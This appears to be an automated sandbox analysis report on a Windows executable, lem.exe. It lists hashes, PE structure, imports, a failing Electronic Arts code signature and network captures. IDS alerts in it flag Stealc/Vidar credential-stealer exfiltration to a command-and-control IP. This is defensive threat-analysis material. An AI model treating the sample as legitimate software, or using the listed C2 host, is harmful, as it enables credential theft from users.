                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8ddbTDvVH3idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbU6y+yT+:8rXET/TbxWOvTb9y7T
                                                                                                                                                                                                                                                                                                  MD5:1C4F40D15345EB92A8342AC92607BBF9
                                                                                                                                                                                                                                                                                                  SHA1:321E09593709AF09BD6957238DDD37C11F147AD7
                                                                                                                                                                                                                                                                                                  SHA-256:3996A7F7E9033E64F8ADDC2024B5A2865370B801741F2E5486E8E968CA1A2875
                                                                                                                                                                                                                                                                                                  SHA-512:B0E52B263D2102A95846B87413FBE48E38720A9E8EFD8E02B8E95B3C27E951FAEE5451C8B79AF41B22E2DB25B4B2ED2BDFC17E53409F12ACCAEBDAAD2DCDAEC7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3239)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):3244
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8651696873407255
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:xm2SliBFd66666rusLRAycFGy4dXvUBffQffo:oFAFd66666rustH4GBdK
                                                                                                                                                                                                                                                                                                  MD5:7ED640BBF262B8590D26FA1B99ACC611
                                                                                                                                                                                                                                                                                                  SHA1:FD2334AD793D168DE847FE8B6E67D466B47A35DC
                                                                                                                                                                                                                                                                                                  SHA-256:AEFFEC86885A6D01E568E3AF7BE3FAE1ED55767CA852E12895C788E207ABDF58
                                                                                                                                                                                                                                                                                                  SHA-512:7EB5209427BD456F8CC1873D86B7C718E288A142C33B88C4F97080D76D0D800D459F463E1319A75F5472160E14009873C161D51C46FF47AEAC3C6CDBD9E2D649
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["episode 12 danmachi season 5","epic games store free games","interest rates mortgages","victor wembanyama","aurora borealis northern lights forecast","universal studios rip ride rockit","nintendo switch 2 console","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):132755
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.436954404704743
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fFkJQ7O4N5dTm+syHEt4W3XdQ4Q6suSr/nUW2i6o:fUQ7HTt/sHdQ4Q6sDfUW8o
                                                                                                                                                                                                                                                                                                  MD5:73E60843ED751AFE939904B2C3A65E34
                                                                                                                                                                                                                                                                                                  SHA1:C78DE8DDAC890D5B558C74A278DC2B1FD9994C93
                                                                                                                                                                                                                                                                                                  SHA-256:F373EAA364D27D61AC1904E40099AA9DC0EB6FC4538B5F23086B468CEA35C270
                                                                                                                                                                                                                                                                                                  SHA-512:7C7C4F6EBD00C455D99EB4B789BA8E6E2DDAFA9F70744658AE9FBEA9283230299C63DC9A62BAD3B3A539BFDC125BC10EB3573F1A538D1B193849AF59DF984845
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963622315465213
                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                  File name:lem.exe
                                                                                                                                                                                                                                                                                                  File size:1'273'852 bytes
                                                                                                                                                                                                                                                                                                  MD5:5782bea403267e4a6ddf82263332ed59
                                                                                                                                                                                                                                                                                                  SHA1:2c1967ed35f79ce390ee56f30fdfa6d97426c4c9
                                                                                                                                                                                                                                                                                                  SHA256:0f9003739fc0213ff837f03f9c1ce4c835e3aab255c94d388aefb9d9b985cb2d
                                                                                                                                                                                                                                                                                                  SHA512:c52f301175e70162ef230f9bef37c587c1168b8a79048583f65b52a5b35075dfa6569c5c6a0729a2b489d4d92e62b11bb0b0bd3c9dbce22c00cb1327f06ae5e6
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:iSw7GQaYEXaOrP0awJKdb0QmZoEOWlx7uloMwppPETOJ4gD5zWs00:87/cXdsjJ4b0QAjOS7SoMwptK64gDgd0
                                                                                                                                                                                                                                                                                                  TLSH:F645232FD2D984AEE0F34F769674CF2781BDF1441929D10BA0A95ACE3E11B11C29A377
                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                                  Icon Hash:2970d080e071b26b
                                                                                                                                                                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 04/05/2023 02:00:00 07/05/2026 01:59:59
Subject Chain
• CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
Version: 3
Thumbprint MD5: 33BD4710688F5874BAC612E52BCCEEA8
Thumbprint SHA-1: A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
Thumbprint SHA-256: 0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
Serial: 0671352DC4C103B70AE725E954486374
                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                  call 00007F23B48EB41Bh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 0040A264h
                                                                                                                                                                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                  push 0040A24Ch
                                                                                                                                                                                                                                                                                                  push 00476AA0h
                                                                                                                                                                                                                                                                                                  call 00007F23B48EB0FDh
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  call 00007F23B48EB0EBh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                                                                                                  jne 00007F23B48E89EAh
                                                                                                                                                                                                                                                                                                  push 00000022h
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call 00007F23B48EADC1h
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                  jmp 00007F23B48E8A73h
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                                                  cmp ax, bx
                                                                                                                                                                                                                                                                                                  jne 00007F23B48E89EAh
                                                                                                                                                                                                                                                                                                  add esi, 02h
                                                                                                                                                                                                                                                                                                  cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x698da | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x13479c | 0x2860 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x698da | 0x69a00 | e6d6fe85c71878ba00f98018544938ae | False | 0.9763382951183432 | data | 7.920076863376912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x16a000 | 0xfd6 | 0x1000 | 73cd15b3d37d3a4f2ad84f805d510922 | False | 0.56884765625 | data | 5.323741431782735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100298 | 0x5eb50 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.998100123736853
RT_ICON | 0x15ede8 | 0x65c9 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0001151322101547
RT_ICON | 0x1653b4 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.48677786818551666
RT_ICON | 0x167a1c | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.5448542805100182
RT_ICON | 0x168b44 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6666666666666666
RT_DIALOG | 0x168fac | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x1690ac | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x1691c8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x169228 | 0x4c | data | English | United States | 0.8026315789473685
RT_VERSION | 0x169274 | 0x390 | data | English | United States | 0.41228070175438597
RT_MANIFEST | 0x169604 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T07:00:45.763263+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.5 | 49762 | 188.245.216.205 | 443 | TCP
2024-12-27T07:00:48.168332+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.5 | 49768 | 188.245.216.205 | 443 | TCP
2024-12-27T07:00:50.573984+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 188.245.216.205 | 443 | 192.168.2.5 | 49774 | TCP
2024-12-27T07:00:53.193412+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 188.245.216.205 | 443 | 192.168.2.5 | 49780 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763293982 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763358116 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763382912 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763401031 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763428926 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763443947 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763694048 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763709068 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765193939 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765238047 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765292883 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765656948 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765672922 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.257612944 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.257689953 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.258272886 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.258282900 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.259938002 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.259944916 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168311119 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168334961 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168399096 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168401957 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168423891 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168447971 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168689013 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168705940 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171089888 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171195030 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171279907 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171547890 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171588898 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.672704935 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.672794104 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.673209906 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.673228025 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.674875021 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.674887896 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573801041 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573826075 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573895931 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573935032 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573980093 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.574232101 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.574259996 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.575728893 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.575777054 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.575851917 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.576251030 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.576261044 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976250887 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976330042 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976778030 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976783991 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.978234053 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.978238106 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193248034 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193314075 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193329096 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193373919 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193582058 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193597078 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.217722893 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.217855930 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.217947960 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.218122959 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.218153954 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.258678913 CET49789443192.168.2.5188.245.216.205
